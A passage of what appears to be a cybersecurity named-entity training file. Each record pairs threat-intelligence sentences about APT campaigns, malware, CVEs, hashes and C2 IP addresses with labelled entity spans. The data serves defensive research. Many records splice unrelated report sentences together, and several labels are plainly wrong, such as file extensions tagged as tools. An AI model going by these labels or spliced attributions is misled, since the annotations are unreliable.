242]]}, "info": {"id": "cyberner_stix_train_007879", "source": "cyberner_stix_train"}} {"text": "The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes . 
Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor .", "spans": {"THREAT_ACTOR: threat actor": [[53, 65]], "TOOL: mimikatz": [[81, 89]], "VULNERABILITY: exploit": [[127, 134]], "SYSTEM: Linux": [[208, 213], [258, 263]]}, "info": {"id": "cyberner_stix_train_007880", "source": "cyberner_stix_train"}} {"text": "In 2011 , three years after the most recent release of PIVY , attackers used the RAT to compromise security firm RSA and steal data about its SecureID authentication system . Based on the command capabilities of the Taidoor malware , we were able to determine that data theft and data destruction was possible .", "spans": {"TOOL: PIVY": [[55, 59]], "THREAT_ACTOR: attackers": [[62, 71]], "TOOL: RAT": [[81, 84]], "ORGANIZATION: security firm RSA": [[99, 116]], "MALWARE: Taidoor": [[216, 223]], "MALWARE: malware": [[224, 231]]}, "info": {"id": "cyberner_stix_train_007881", "source": "cyberner_stix_train"}} {"text": "This document appeared to be targeting a government organization dealing with foreign affairs in Europe via spear-phishing .", "spans": {}, "info": {"id": "cyberner_stix_train_007882", "source": "cyberner_stix_train"}} {"text": "The payload delivered in these November 2017 attacks using DDE enabled documents was SofacyCarberp , which differs from the Zebrocy downloader delivered in the February 2018 attacks . 
115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03 was another Zebrocy sample we were able to pivot from by gathering additional samples connecting to its C2 86.106.131.177 .", "spans": {"MALWARE: SofacyCarberp": [[85, 98]], "MALWARE: Zebrocy": [[124, 131], [261, 268]], "FILEPATH: 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03": [[184, 248]], "TOOL: C2": [[353, 355]], "IP_ADDRESS: 86.106.131.177": [[356, 370]]}, "info": {"id": "cyberner_stix_train_007883", "source": "cyberner_stix_train"}} {"text": "The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . This program is designed to capture keystrokes , take screenshots of the user 's desktop and get contents from the clipboard .", "spans": {"TOOL: ActiveX control": [[46, 61]], "MALWARE: JavaScript file": [[76, 91]], "VULNERABILITY: CVE-2013-7331": [[203, 216]]}, "info": {"id": "cyberner_stix_train_007884", "source": "cyberner_stix_train"}} {"text": "31a8633c2cd67ae965524d0b2192e9f14d04d016 FinFisher exposed : A researcher ’ s tale of defeating traps , tricks , and complex virtual machines March 1 , 2018 Office 365 Advanced Threat Protection ( Office 365 ATP ) blocked many notable zero-day exploits in 2017 . The actor 's targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China . At the time of writing , none of the domains resolve and the C&C servers are not responding . 
Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": {"MALWARE: FinFisher": [[41, 50]], "SYSTEM: Office 365 Advanced Threat Protection": [[157, 194]], "SYSTEM: Office 365 ATP": [[197, 211]], "THREAT_ACTOR: actor": [[267, 272], [387, 392]]}, "info": {"id": "cyberner_stix_train_007885", "source": "cyberner_stix_train"}} {"text": "Transparent Tribe has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets . The Word document usually exploits CVE-2012-0158 .", "spans": {"ORGANIZATION: political and military targets": [[132, 162]], "TOOL: Word": [[169, 173]], "VULNERABILITY: CVE-2012-0158": [[200, 213]]}, "info": {"id": "cyberner_stix_train_007886", "source": "cyberner_stix_train"}} {"text": "“ Cyber Conflict ” Decoy Document Used In Real Cyber Conflict .", "spans": {}, "info": {"id": "cyberner_stix_train_007887", "source": "cyberner_stix_train"}} {"text": "This new mobile ransomware variant is an important discovery because the malware exhibits behaviors that have not been seen before and could open doors for other malware to follow . Over the years , the Ke3chang attackers have used three types of malware that we call : \" BS2005 \" , \" BMW \" , and \" MyWeb \" . This implementation will deobfuscate approximately 89% of encountered functions . 
The next is to call with expecting it to return 0 as it is likely to have an environment variable name like that .", "spans": {"THREAT_ACTOR: Ke3chang": [[203, 211]], "THREAT_ACTOR: attackers": [[212, 221]], "TOOL: BS2005": [[272, 278]], "TOOL: BMW": [[285, 288]], "TOOL: MyWeb": [[299, 304]]}, "info": {"id": "cyberner_stix_train_007888", "source": "cyberner_stix_train"}} {"text": "It repeatedly attempts to iterate through directories and to collect files with the following extensions : doc , docx , ppt , pptx , pps , ppsx , xls , xlsx , and pdf . We believe the 2013 , 2015 , and 2016 KeyBoy samples provide evidence of a development effort focused on changing components that would be used by researchers to develop detection signatures .", "spans": {"TOOL: doc": [[107, 110]], "TOOL: docx": [[113, 117]], "TOOL: ppt": [[120, 123]], "TOOL: pptx": [[126, 130]], "TOOL: pps": [[133, 136]], "TOOL: ppsx": [[139, 143]], "TOOL: xls": [[146, 149]], "TOOL: xlsx": [[152, 156]], "TOOL: pdf": [[163, 166]], "MALWARE: KeyBoy samples": [[207, 221]]}, "info": {"id": "cyberner_stix_train_007889", "source": "cyberner_stix_train"}} {"text": "Shellcode simply uses dlopen to open a .so file within the target process and then dlsym to find a symbol in that file and run it . In the previous pages we have presented our findings based on ESET detection telemetry and our analysis of Win32/Potao and Win32/FakeTC samples . APT17 : 130.184.156.62 . Its code identifies the victim ’s browser and then serves one of two exploits .", "spans": {"ORGANIZATION: symbol": [[99, 105]], "ORGANIZATION: ESET": [[194, 198]], "TOOL: Win32/Potao": [[239, 250]], "TOOL: Win32/FakeTC samples": [[255, 275]], "THREAT_ACTOR: APT17": [[278, 283]], "IP_ADDRESS: 130.184.156.62": [[286, 300]]}, "info": {"id": "cyberner_stix_train_007890", "source": "cyberner_stix_train"}} {"text": "Upon receiving the command GUIFXB , the spyware launches a fake Facebook login page . Development of Bemstour has continued into 2019 . 
Their main targets reside in Russia , Ukraine , Belarus , Azerbaijan , Poland and Kazakhstan .", "spans": {"SYSTEM: Facebook": [[64, 72]], "MALWARE: Bemstour": [[101, 109]]}, "info": {"id": "cyberner_stix_train_007891", "source": "cyberner_stix_train"}} {"text": "While the behavior of the attackers differs slightly in each compromise , generally once the attackers have identified the desired intellectual property , they copy the content to archives on internal systems they use as internal staging servers .", "spans": {}, "info": {"id": "cyberner_stix_train_007892", "source": "cyberner_stix_train"}} {"text": "After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world .", "spans": {"MALWARE: Pony": [[48, 52]], "MALWARE: Vawtrak": [[57, 64]], "ORGANIZATION: embassies": [[175, 184]]}, "info": {"id": "cyberner_stix_train_007893", "source": "cyberner_stix_train"}} {"text": "Instead of being written in Assembly or C , it was written in C++ , which provides added layers of abstraction for the developer ’s perusal , at the cost of added complexity .", "spans": {"TOOL: C": [[40, 41]], "TOOL: C++": [[62, 65]]}, "info": {"id": "cyberner_stix_train_007894", "source": "cyberner_stix_train"}} {"text": "PLATINUM has been targeting its victims since at least as early as 2009 , and may have been active for several years prior . 
MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "THREAT_ACTOR: MUSTANG PANDA": [[125, 138]], "MALWARE: PowerShell scripts": [[209, 227]], "MALWARE: Microsoft Office documents": [[232, 258]], "ORGANIZATION: NGOs": [[299, 303]]}, "info": {"id": "cyberner_stix_train_007895", "source": "cyberner_stix_train"}} {"text": "EventBot Updated library naming convention EventBot New library naming convention . The well-crafted and socially engineered malicious documents then become the first stage of a long and mainly fileless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group . In early 2017 , Mandiant responded to an incident involving APT35 targeting an energy company .", "spans": {"MALWARE: EventBot": [[43, 51]], "MALWARE: POWERSTATS": [[242, 252]], "MALWARE: PowerShell backdoor": [[267, 286]], "THREAT_ACTOR: threat group": [[295, 307]], "ORGANIZATION: Mandiant": [[326, 334]], "THREAT_ACTOR: APT35": [[370, 375]], "ORGANIZATION: energy company": [[389, 403]]}, "info": {"id": "cyberner_stix_train_007896", "source": "cyberner_stix_train"}} {"text": "As mentioned above , EventBot Version 0.0.0.1 sends a JSON object containing the Android package names of all the apps installed on the victim ’ s device alongside additional metadata , including the bot version , botnetID , and the reason this package is sent . The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . 
The OilRig group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries .", "spans": {"MALWARE: EventBot": [[21, 29]], "SYSTEM: Android": [[81, 88]], "MALWARE: configuration file": [[267, 285]], "THREAT_ACTOR: OilRig group": [[381, 393]], "ORGANIZATION: financial": [[455, 464]], "ORGANIZATION: government": [[467, 477]], "ORGANIZATION: energy": [[480, 486]], "ORGANIZATION: chemical": [[489, 497]], "ORGANIZATION: telecommunications": [[500, 518]]}, "info": {"id": "cyberner_stix_train_007897", "source": "cyberner_stix_train"}} {"text": "Even if the noisy initial CozyDuke campaign is noticed by the victim organization , or by someone else who then makes it publicly known , defenders will begin by first looking for indicators of compromise ( IOCs ) related to the CozyDuke toolset .", "spans": {"MALWARE: CozyDuke": [[26, 34], [229, 237]], "TOOL: indicators of compromise": [[180, 204]], "TOOL: IOCs": [[207, 211]]}, "info": {"id": "cyberner_stix_train_007898", "source": "cyberner_stix_train"}} {"text": "This helps protect sensitive information and critical services , and limits damage from network perimeter breaches .", "spans": {}, "info": {"id": "cyberner_stix_train_007899", "source": "cyberner_stix_train"}} {"text": "During a high profile incident we investigated , our products successfully detected and blocked a “ standard ” Sofacy “ AZZY ” sample that was used to target a range of defense contractors .", "spans": {"THREAT_ACTOR: Sofacy": [[111, 117]], "MALWARE: AZZY": [[120, 124]]}, "info": {"id": "cyberner_stix_train_007900", "source": "cyberner_stix_train"}} {"text": "In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from 
unknown markets , or research and utilize the zero-day exploits themselves . Recently , Falcon Intelligence observed new activity from MUSTANG PANDA , using a unique infection chain to target likely Mongolia-based victims .", "spans": {"THREAT_ACTOR: PLATINUM": [[11, 19]], "VULNERABILITY: zero-day exploits": [[37, 54], [289, 306], [358, 375]], "ORGANIZATION: Falcon Intelligence": [[400, 419]], "MALWARE: infection chain": [[478, 493]]}, "info": {"id": "cyberner_stix_train_007901", "source": "cyberner_stix_train"}} {"text": "In particular , avoid side-loading apps from third-party app stores and avoid the temptation to play games that are not yet available on Android . The corporation conrms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions.” Henkel claims that a very small portion” of its worldwide IT systems had been aected — the systems in Germany . The group , which we have given the name Gallmaker , has been operating since at least December 2017 , with its most recent activity observed in June 2018 .", "spans": {"SYSTEM: Android": [[137, 144]], "THREAT_ACTOR: Winnti": [[174, 180]], "THREAT_ACTOR: Gallmaker": [[485, 494]]}, "info": {"id": "cyberner_stix_train_007902", "source": "cyberner_stix_train"}} {"text": "Attackers are making growing use of utilities like Winexe and PSExec to perform lateral movement across compromised networks .", "spans": {"TOOL: Winexe": [[51, 57]], "TOOL: PSExec": [[62, 68]]}, "info": {"id": "cyberner_stix_train_007903", "source": "cyberner_stix_train"}} {"text": "RAR SFX directives are used to display the decoy while the malicious payload is executed .", "spans": {"TOOL: RAR": [[0, 3]], "TOOL: SFX": [[4, 7]]}, "info": {"id": "cyberner_stix_train_007904", "source": "cyberner_stix_train"}} {"text": "During a typical incident , the actor would modify the NS records for the targeted organization , pointing users to a malicious DNS 
server that provided actor-controlled responses to all DNS queries . The tools found in this campaign , such as the HyperBro Trojan , are regularly used by a variety of Chinese-speaking actors .", "spans": {"THREAT_ACTOR: actor": [[32, 37]], "MALWARE: HyperBro Trojan": [[248, 263]]}, "info": {"id": "cyberner_stix_train_007905", "source": "cyberner_stix_train"}} {"text": "If the data received from the C2 server starts with the same string , then the remainder of the payload is decompressed using ORat 's \"deflate\" algorithm and called as a function .", "spans": {"TOOL: C2": [[30, 32]], "MALWARE: ORat": [[126, 130]]}, "info": {"id": "cyberner_stix_train_007906", "source": "cyberner_stix_train"}} {"text": "As originally detailed in Kaspersky ’s whitepaper , the MiniDuke campaigns from February 2013 employed spear-phishing emails with malicious PDF file attachments .", "spans": {"ORGANIZATION: Kaspersky": [[26, 35]], "MALWARE: MiniDuke": [[56, 64]], "TOOL: emails": [[118, 124]], "TOOL: PDF": [[140, 143]]}, "info": {"id": "cyberner_stix_train_007907", "source": "cyberner_stix_train"}} {"text": "id= $ NUM ” . The registrant information for kernel.ws also provided a geolocation of Tehran , IR and the email provider for the address used in checkgoogle.org was the same used for mydomain1607.com , chmail.ir . Gamaredon : c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f . 
But what happens when an unidentified virus infects a victims computer Antivirus programs can only protect against threats they already know .", "spans": {"ORGANIZATION: email provider": [[106, 120]], "THREAT_ACTOR: Gamaredon": [[214, 223]], "FILEPATH: c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f": [[226, 290]], "MALWARE: unidentified virus": [[318, 336]], "ORGANIZATION: Antivirus programs": [[364, 382]]}, "info": {"id": "cyberner_stix_train_007908", "source": "cyberner_stix_train"}} {"text": "Patchwork has also recently employed Android malware in its attacks , with its use of a customized version of AndroRAT . For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 .", "spans": {"THREAT_ACTOR: Patchwork": [[0, 9]], "TOOL: Android malware": [[37, 52]], "TOOL: AndroRAT": [[110, 118]], "VULNERABILITY: zero-day": [[139, 147]], "VULNERABILITY: exploit": [[162, 169]], "VULNERABILITY: CVE-2015-2545": [[172, 185]], "THREAT_ACTOR: PLATINUM": [[196, 204]]}, "info": {"id": "cyberner_stix_train_007909", "source": "cyberner_stix_train"}} {"text": "According to Kaspersky Lab’s report , NetTraveler has been active since as early as 2004; however , the highest volume of activity occurred from 2010 – 2013 . APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems . The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets . Like other Chinese espionage operators , APT41 appears to have moved toward strategic intelligence collection and establishing access and aACT from direct intellectual property theft since 2015 . This shift , however , has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons . 
BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e. , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e. , possibly en masse . With the contents of the emails , included links and decoy PDFs all involving taxes , the attackers are apparently targeting the financial departments of organizations in the Balkans region . Some parts of the campaign were briefly described by a Serbian security provider in 2016 and the Croatian CERT in 2017 . The campaign has been active at least from January 2016 to the time of writing the most recent detections in our telemetry are from July 2019 . Our findings show that the mentioned attacks have been orchestrated and we consider them a single long-term campaign that spans Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . We’ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . According to our telemetry , the campaign spreading these tools has been live since 2016 , with the most recent detections as late as in July 2019 . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e. , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . Via the BalkanDoor backdoor , the attacker sends a backdoor command to unlock the screen… and using BalkanRAT , they can do whatever they want on the computer . The BalkanDoor backdoor does not implement any Exfiltration channel . APT41 leveraged ADORE.XSEC , a Linux backdoor launched by the Adore-NG rootkit , throughout an organization's Linux environment . The backdoor can connect to any of the C&Cs from a hardcoded list – a measure to increase resilience . 
The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access . Interestingly , some of the APT41's POISONPLUG malware samples leverage the Steam Community website associated with Valve , a video game developer and publisher . The campaign targeting accountants in the Balkans shows some similarities with a campaign aimed at Ukrainian notaries reported in 2016 . Based on the Let’s Encrypt certificate issuance date , we believe this campaign to be active from May 2019 . One of the domains uncovered during the investigation was identified by the Chinese security vendor CERT 360 as being part of the BITTER APT campaign in May 2019 . Further analysis of the BITTER APT’s infrastructure uncovered a broader phishing campaign targeting other government sites and state-owned enterprises in China . Further investigation revealed approximately 40 additional sites , all of which appear to be targeting the government of China and other organisations in China . We expect to see BITTER APT continuing to target the government of China by employing spoofed login pages designed to steal user credentials and obtain access to privileged account information . This domain and IP address has been previously associated with the BITTER APT and targeting government agencies in China with phishing attacks , based on reporting from 360-CERT . At the time of analysis , the subdomains did not host a website; however , based on BITTER APT group’s targeting patterns , it is highly likely that they were created to host faux login phishing pages designed to steal user’s credentials . BITTER APT campaigns are primarily targeting China , Pakistan and Saudi Arabia historically . As part of its ongoing research initiatives , the Anomali Threat Research Team has discovered a new phishing attack leveraging spoof sites that seem to be designed to steal email credentials from the target victims within the government of the People’s Republic of China . 
360 Threat Intelligence Center has reported on related indicators being attributed to BITTER APT a South Asian country suspected Indian APT in open source reporting . China Chopper is a tool that has been used by some state-sponsored actors such as Leviathan and Threat Group-3390 , but during our investigation we've seen actors with varying skill levels . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017 , which shows that even nine years after its creation , attackers are using China Chopper without significant modifications . Here , we investigate a campaign targeting an Asian government organization . We observed another campaign targeting an organisation located in Lebanon . China Chopper contains a remote shell ( Virtual Terminal ) function that has a first suggested command of netstat an|find ESTABLISHED . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . The actor attempts to exploit CVE-2018–8440 — an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit . The attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server . The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims . 
From the beginning of 2019 until July , we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia , Central Asia and regions of Ukraine with ongoing military conflicts . We described one of the techniques used by Cloud Atlas in 2017 and our colleagues at Palo Alto Networks also wrote about it in November 2018 . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . Previously , Cloud Atlas dropped its validator” implant named PowerShower” directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 . This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage . Cloud Atlas remains very prolific in Eastern Europe and Central Asia . During its recent campaigns , Cloud Atlas used a new polymorphic” infection chain relying no more on PowerShower directly after infection , but executing a polymorphic HTA hosted on a remote server , which is used to drop three different files on the local system . The Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and military departments from the mid-2013s . In addition , the anonymous cybersecurity experts referenced in the article connected the malicious Gamaredon Group actors with Russian state-sponsored hackers . In one article published in the Kharkiv Observer – an independent Ukranian online publication – an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group . Gamaredon Group primarily target Ukrainian organizations and resources using spear-phishing attacks , and they use military or similar documents as bait . 
Once they have found a victim , they then deploy remote manipulation system binaries (RMS) via self-extracting archives and batch command files . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . During a recent incident response investigation , our team identified new attacks by the financially motivated attack group ITG08 , also known as FIN6 . More recently , ITG08 has been observed targeting e-commerce environments by injecting malicious code into online checkout pages of compromised websites — a technique known as online skimming — thereby stealing payment card data transmitted to the vendor by unsuspecting customers . This tool , a TTP observed in ITG08 attacks since 2018 , is sold on the dark web by an underground malware-as-a-service (MaaS) provider . ITG08 is an organized cybercrime gang that has been active since 2015 , mostly targeting pointof-sale (POS) machines in brick-and-mortar retailers and companies in the hospitality sector in the U.S. and Europe . Past campaigns by ITG08 using the More_eggs backdoor were last reported in February 2019 . Attackers use it to create , expand and cement their foothold in compromised environments . Lastly , ITG08 used Comodo code-signing certificates several times during the course of the campaign . Let’s take a closer look at ITG08’s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . X-Force IRIS determined that the More_eggs backdoor later downloaded additional files , including a signed binary shellcode loader and a signed Dynamic Link Library ( DLL ) , as described below , to create a reverse shell and connect to a remote host . 
Once the ITG08 established a foothold on the network , they employed WMI and PowerShell techniques to perform network reconnaissance and move laterally within the environment . The attackers used this technique to remotely install a Metasploit reverse TCP stager on select systems , subsequently spawning a Meterpreter session and Mimikatz . In addition to the More_eggs malware , ITG08 leveraged in-memory attacks by injecting malicious code , in this case Mimikatz , into legitimate system processes . A recently rising attack tool in ITG08 campaigns has been the More_eggs JScript backdoor . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . After a successful phishing attack in which users have opened emails and browsed to malicious links , ITG08 attackers install the More_eggs JScript backdoor on user devices alongside several other malware components . Beyond using More_eggs as a backdoor , ITG08 in this campaign also used offensive security tools and PowerShell scripts to carry out the different stages of the attack . After injecting Meterpreter into memory , the attacker had complete control of the infected device . IBM X-Force IRIS has gained insight into ITG08’s intrusion methods , ability to navigate laterally , use of custom and open-source tools , and typical persistence mechanisms . After the phishing email resulted in a successful infiltration , ITG08 used the More_eggs backdoor to gain a foothold and infect additional devices . In addition , configuring PowerShell script logging and identifying any obfuscation will assist in mitigating ITG08’s use of PowerShell to conduct malicious activity . The LYCEUM threat group targets organizations in sectors of strategic national importance , including oil and gas and possibly telecommunications . CTU research indicates that LYCEUM may have been active as early as April 2018 . 
In May 2019 , the threat group launched a campaign against oil and gas organizations in the Middle East . This campaign followed a sharp uptick in development and testing of their toolkit against a public multivendor malware scanning service in February 2019 . Stylistically , the observed tradecraft resembles activity from groups such as COBALT GYPSY (which is related to OilRig , Crambus , and APT34 and COBALT TRINITY also known as Elfin and APT33 . When CTU researchers first published information about LYCEUM to Secureworks Threat Intelligence clients , no public documentation on the group existed . Using compromised accounts , LYCEUM send spearphishing emails with malicious Excel attachments to deliver the DanBot malware , which subsequently deploys post-intrusion tools . The developer consistently used Accept-Enconding” (note the extra ‘n’) in all DanBot samples analyzed by CTU researchers . Get-LAPSP.ps1 is a PowerShell script that gathers account information from Active Directory via LDAP . LYCEUM deployed this tool via DanBot shortly after gaining initial access to a compromised environment . LYCEUM delivers weaponized maldocs via spearphishing from the compromised accounts to the targeted executives , human resources (HR) staff , and IT personnel . This focus on training aligns with LYCEUM’s targeting of executives , HR staff , and IT personnel . Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments . However , CTU researchers cannot dismiss the possibility that the LYCEUM could seek access to OT environments after establishing robust access to the IT environment . LYCEUM is an emerging threat to energy organizations in the Middle East , but organizations should not assume that future targeting will be limited to this sector . 
Aside from deploying novel malware , LYCEUM’s activity demonstrates capabilities CTU researchers have observed from other threat groups and reinforces the value of a few key controls . Password spraying , DNS tunneling , social engineering , and abuse of security testing frameworks are common tactics , particularly from threat groups operating in the Middle East . The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . Machete is still very active at the time of this publication , regularly introducing changes to its malware , infrastructure and spearphishing campaigns . ESET has been tracking a new version of Machete (the group’s Python-based toolset) that was first seen in April 2018 . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted with the Machete malware . Their long run of attacks , focused on Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . Machete is interested in files that describe navigation routes and positioning using military grids . The Machete group sends very specific emails directly to its victims , and these change from target to target . The Machete group is very active and has introduced several changes to its malware since a new version was released in April 2018 . Previous versions were described by Kaspersky in 2014 and Cylance in 2017 . Since August 2018 , the Machete components have been delivered with an extra layer of obfuscation . The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . ESET has been tracking this threat for months and has observed several changes , sometimes within weeks . This ACT , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . 
The presence of code to exfiltrate data to removable drives when there is physical access to a compromised computer may indicate that Machete operators could have a presence in one of the targeted countries , although we cannot be certain . This group is very active and continues to develop new features for its malware , and implement infrastructure changes in 2019 . Machete's long run of attacks , focused in Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . ESET researchers have detected an ongoing , highly targeted campaign , with a majority of the targets being military organizations . The group behind Machete uses effective spearphishing techniques . First described by Kaspersky in 2014 [1] and later , by Cylance in 2017 [2] , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . In 2018 Machete reappeared with new code and new features . As of June 2019 , ESET has seen over 50 victims being actively spied upon by Machete , with more than half of them being computers belonging to the Venezuelan military forces . Machete has Latin American targets and has been developed by a Spanish-speaking group , presumably from a LATAM country . Machete was active and constantly working on very effective spearphishing campaigns . In some cases , Machete trick new victims by sending real documents that had been stolen on the very same day . Machete relies on spearphishing to compromise its targets . They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . Attackers take advantage of that , along with their knowledge of military jargon and etiquette , to craft very convincing phishing emails . 
Operators behind Machete apparently already have information about individuals or organizations of interest to them in Latin America , how to reach them , and how best to trick them into getting compromised . Since the end of March up until the end of May 2019 , ESET observed that there were more than 50 victimized computers actively communicating with the C&C server . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted by Machete . Machete is malware that has been developed and is actively maintained by a Spanish-speaking group . Since it was active in 2012 , it has been carrying out attacks against sensitive targets in China and is one of the most active APT attack organizations targeting mainland China in recent years . By introducing small changes to their code and infrastructure , the group has bypassed several security products . OceanLotus will release malicious sub-packages in the background , receive the remote control command , steal the privacy information of users such as SMS messages , contacts , call records , geographic locations , and browser records . They also download apks secretly and record audios and videos , then upload users’ privacy information to server , causing users’ privacy leakage . It can be seen that after the code leakage , the CEO of the HackingTeam organization said that the leaked code is only a small part is based on the facts , which also reflects that the network arms merchants have lowered the threshold of APT attacks to a certain extent , making more uncertainties of cyber attacks . This report includes details related to the major hacking targets of the SectorJ04 group in 2019 , how those targets were hacked , characteristics of their hacking activities this year and recent cases of the SectorJ04 group’s hacking . 
In 2019 , the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia , and is changing the pattern of their attacks from targeted attacks to searching for random victims . The SectorJ04 group has maintained the scope of its existing hacking activities while expanding its hacking activities to companies in various industrial sectors located in East Asia and Southeast Asia . There was a significant increase in SectorJ04's hacking activities in 2019 , especially those targeting South Korea . They mainly utilize spam email to deliver their backdoor to the infected system that can perform additional commands from the attacker’s server . We saw SectorJ04 group activity in Germany , Indonesia , the United States , Taiwan , India . The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . The SectorJ04 group’s preexisting targets were financial institutions located in countries such as North America and Europe , or general companies such as retail and manufacturing , but they recently expanded their LOCs of activity to include the medical , pharmaceutical , media , energy and manufacturing industries . 
The SectorJ04 group mainly used their own backdoor , ServHelper and FlawedAmmy RAT , for hacking .", "spans": {"ORGANIZATION: Kaspersky": [[13, 22], [15759, 15768], [16990, 16999]], "THREAT_ACTOR: NetTraveler": [[38, 49]], "THREAT_ACTOR: APT41": [[159, 164], [357, 362], [493, 498], [2555, 2560]], "TOOL: Master Boot Record": [[196, 214]], "TOOL: (MBR)": [[215, 220]], "THREAT_ACTOR: group's": [[692, 699]], "ORGANIZATION: video game industry": [[737, 756]], "FILEPATH: BalkanRAT": [[793, 802], [1833, 1842]], "FILEPATH: BalkanDoor": [[914, 924], [1847, 1857], [2111, 2121]], "TOOL: emails": [[1056, 1062], [6596, 6602], [11309, 11315], [13122, 13128], [15517, 15523], [18085, 18091]], "THREAT_ACTOR: attackers": [[1121, 1130], [5163, 5172], [5461, 5470], [10728, 10737]], "ORGANIZATION: financial": [[1160, 1169]], "ORGANIZATION: Serbian security": [[1278, 1294]], "THREAT_ACTOR: attacks": [[1525, 1532]], "THREAT_ACTOR: BalkanDoor": [[1711, 1721]], "VULNERABILITY: exploit": [[1771, 1778], [2270, 2277], [6138, 6145], [6341, 6348], [7089, 7096], [7120, 7127]], "TOOL: WinRAR": [[1786, 1792], [2282, 2288], [8795, 8801]], "VULNERABILITY: CVE-2018-20250": [[1811, 1825], [2307, 2321]], "THREAT_ACTOR: attacker": [[2358, 2366], [6355, 6363], [7217, 7225], [11681, 11689], [20947, 20955]], "MALWARE: BalkanRAT": [[2424, 2433]], "MALWARE: BalkanDoor backdoor": [[2489, 2508]], "MALWARE: ADORE.XSEC": [[2571, 2581]], "SYSTEM: Linux": [[2586, 2591], [2665, 2670]], "FILEPATH: backdoor": [[2689, 2697]], "FILEPATH: BalkanRAT malware": [[2809, 2826]], "THREAT_ACTOR: APT41's": [[2918, 2925]], "MALWARE: POISONPLUG": [[2926, 2936]], "ORGANIZATION: Encrypt": [[3209, 3216]], "ORGANIZATION: CERT 360": [[3399, 3407]], "THREAT_ACTOR: BITTER APT": [[3429, 3439], [3804, 3814], [4049, 4059], [4246, 4256], [4402, 4412], [4855, 4865]], "THREAT_ACTOR: BITTER APT’s": [[3487, 3499]], "ORGANIZATION: government sites": [[3569, 3585]], "ORGANIZATION: enterprises": [[3602, 3613]], "ORGANIZATION: government": [[3732, 
